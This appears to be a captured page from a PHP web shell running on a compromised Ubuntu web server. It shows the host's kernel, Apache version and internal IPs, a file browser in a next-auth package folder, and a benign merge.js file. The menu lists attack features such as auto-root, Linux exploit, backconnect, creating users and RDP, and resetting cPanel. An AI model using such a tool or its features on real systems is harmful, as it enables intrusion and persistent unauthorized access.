Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
next-auth /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
detect-origin.d.ts
183
B
-rw-rw-r--
detect-origin.d.ts.map
202
B
-rw-rw-r--
detect-origin.js
447
B
-rw-rw-r--
logger.d.ts
1.19
KB
-rw-rw-r--
logger.d.ts.map
783
B
-rw-rw-r--
logger.js
3.72
KB
-rw-rw-r--
merge.d.ts
133
B
-rw-rw-r--
merge.d.ts.map
206
B
-rw-rw-r--
merge.js
690
B
-rw-rw-r--
parse-url.d.ts
534
B
-rw-rw-r--
parse-url.d.ts.map
424
B
-rw-rw-r--
parse-url.js
621
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : merge.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.merge = merge; function isObject(item) { return item && typeof item === "object" && !Array.isArray(item); } function merge(target, ...sources) { if (!sources.length) return target; const source = sources.shift(); if (isObject(target) && isObject(source)) { for (const key in source) { if (isObject(source[key])) { if (!target[key]) Object.assign(target, { [key]: {} }); merge(target[key], source[key]); } else { Object.assign(target, { [key]: source[key] }); } } } return merge(target, ...sources); }
Close